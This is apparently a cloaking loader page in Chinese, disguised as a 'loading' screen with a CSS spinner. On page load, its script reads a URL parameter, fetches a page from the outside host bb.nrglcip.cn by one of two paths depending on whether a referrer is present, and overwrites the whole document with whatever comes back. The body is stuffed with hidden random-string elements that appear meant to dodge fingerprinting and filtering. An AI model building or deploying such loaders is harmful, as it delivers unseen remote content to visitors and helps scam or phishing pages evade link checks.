<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .xTR3YgJrAe {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .xTR3YgJrAe .pnDVjixrA {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .xTR3YgJrAe .content {
            line-height: 50px;
            text-align: center
        }

        .xTR3YgJrAe .img {
            width: 100%
        }

        .xTR3YgJrAe .BgAADbgyN {
            text-align: center
        }

        .xTR3YgJrAe .BgAADbgyN span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .xTR3YgJrAe .BgAADbgyN span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .xTR3YgJrAe .BgAADbgyN span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .xTR3YgJrAe .BgAADbgyN span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .xTR3YgJrAe .BgAADbgyN span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .xTR3YgJrAe .BgAADbgyN span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .xTR3YgJrAe .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function MV3S2f8RGYX(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var gfl7s = MV3S2f8RGYX('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ gfl7s +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ gfl7s +".html?a=share";
		}
		
        E0ENk59P=url+"#"+new Date().getTime();
        E0ENk59P && function() {
            $.get(E0ENk59P, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >v3Y9P6VGApRhSqXOL5mSvk0a7VfPrh9L0XhRMvOQVJXVRi1igAC4EfHxO6ffxdxPEjQl</ul>
<span style='display:none'>bmDuuWU7lBGVYQiN6J1MRQUCbJdAgegkZZ1</span>
<p  style='display:none'>U7PtZGTyRR8pKwtA3jm8MF9or6ak2tD1RQfne45KSovK0Mn7o6JLunWhGrylZgm8DkYEBd8rxPbwT2m7cfmUka6DgeY</p>
<span style='display:none'>bmDuuWU7lBGVYQiN6J1MRQUCbJdAgegkZZ1</span>
<b style='display:none' >NNjOlHl7zOSm1y5hldY8bnBlsjaD7Kv8di1VZIMF9x1gjbf8e9bj3BhU7W1Wt7ZylHfQ3IJz9aVPRCTqC0Rb</b>
<span style='display:none'>bmDuuWU7lBGVYQiN6J1MRQUCbJdAgegkZZ1</span>
<img  src='' style='display:none'><div class="xTR3YgJrAe">
    <div class="pnDVjixrA">
        <div class="BgAADbgyN">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >viWrQidG2te2hLDbM4vsoqgSstIpCG94CEoAlwjZJXrolyAu7QnpcYyrJHcI9O8Tl</ul>
<h1 style='display:none' >CTDvgV7skMxvRnszn5gaZKZZouYqfFdgfYtyK4CQTpUXBHr9fRXzj3ILh</h1>
<h1 style='display:none' >CTDvgV7skMxvRnszn5gaZKZZouYqfFdgfYtyK4CQTpUXBHr9fRXzj3ILh</h1>
<p  style='display:none'>cRanQEhtCVTMFTb5UdX1DfpUk5sFN4LGJFROlhFy3WcdJ1KFchL4vWdTYHEKqnJECwT5J6X5VmKm73uu2L</p>
<span style='display:none'>KAITq7TA6A3MgtshUDRWstQ5QiNH9KEIf0bNUesKK3Tktuw6VZZ15Isva3ALTrlRq45RwzpOW4</span>
<ul style='display:none' >viWrQidG2te2hLDbM4vsoqgSstIpCG94CEoAlwjZJXrolyAu7QnpcYyrJHcI9O8Tl</ul>
<span style='display:none'>KAITq7TA6A3MgtshUDRWstQ5QiNH9KEIf0bNUesKK3Tktuw6VZZ15Isva3ALTrlRq45RwzpOW4</span>
<p  style='display:none'>cRanQEhtCVTMFTb5UdX1DfpUk5sFN4LGJFROlhFy3WcdJ1KFchL4vWdTYHEKqnJECwT5J6X5VmKm73uu2L</p></body>
</html>